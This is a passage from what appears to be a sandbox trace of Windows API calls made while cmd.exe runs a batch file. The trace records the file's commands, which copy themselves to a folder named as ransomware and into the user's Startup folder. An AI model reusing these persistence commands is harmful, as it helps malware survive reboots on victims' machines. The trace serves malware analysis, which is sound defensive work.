hFindFile=0xd27170 | out: hFindFile=0xd27170) returned 1 [0037.142] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.142] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.142] GetFileType (hFile=0x28) returned 0x2 [0037.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.142] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.142] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.143] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.143] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.143] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.143] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.144] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.144] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.144] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.144] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.144] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.144] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.144] SetConsoleInputExeNameW () returned 0x1 [0037.144] GetConsoleOutputCP () returned 0x1b5 [0037.144] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.144] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.144] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.145] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.145] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.145] SetFilePointer (in: hFile=0x80, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0037.145] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.145] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0037.145] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x360, lpOverlapped=0x0) returned 1 [0037.145] SetFilePointer (in: hFile=0x80, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0037.145] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0037.145] GetFileType (hFile=0x80) returned 0x1 [0037.168] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.168] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0037.169] _tell (_FileHandle=3) returned 1840 [0037.169] _close (_FileHandle=3) returned 0 [0037.169] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.169] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.169] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.169] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.169] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.169] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.169] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.171] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.171] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe")) returned 0xffffffff [0037.171] GetLastError () returned 0x2 [0037.171] GetFileType (hFile=0x28) returned 0x2 [0037.171] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.171] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ec34 | out: lpMode=0xc8ec34) returned 1 [0037.171] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.171] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ec84 | out: lpConsoleScreenBufferInfo=0xc8ec84) returned 1 [0037.171] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0037.171] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ecb4 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0037.172] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xc8ec68, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ec68*=0x2c) returned 1 [0037.172] longjmp () [0037.172] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.172] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.173] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.173] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.173] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.173] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.173] SetConsoleInputExeNameW () returned 0x1 [0037.173] GetConsoleOutputCP () returned 0x1b5 [0037.173] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.173] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.173] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.173] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.173] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.173] SetFilePointer (in: hFile=0x80, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0037.173] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0037.174] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x33e, lpOverlapped=0x0) returned 1 [0037.174] SetFilePointer (in: hFile=0x80, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0037.174] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0037.174] GetFileType (hFile=0x80) returned 0x1 [0037.174] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.174] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0037.174] _tell (_FileHandle=3) returned 1937 [0037.174] _close (_FileHandle=3) returned 0 [0037.174] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.174] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.174] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.174] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.174] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.174] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.174] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.176] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.176] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe")) returned 0xffffffff [0037.176] GetLastError () returned 0x2 [0037.176] GetFileType (hFile=0x28) returned 0x2 [0037.176] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.177] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ec34 | out: lpMode=0xc8ec34) returned 1 [0037.177] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.177] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ec84 | out: lpConsoleScreenBufferInfo=0xc8ec84) returned 1 [0037.177] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0037.177] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ecb4 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0037.177] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xc8ec68, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ec68*=0x2c) returned 1 [0037.178] longjmp () [0037.178] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.178] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.178] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.178] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.178] 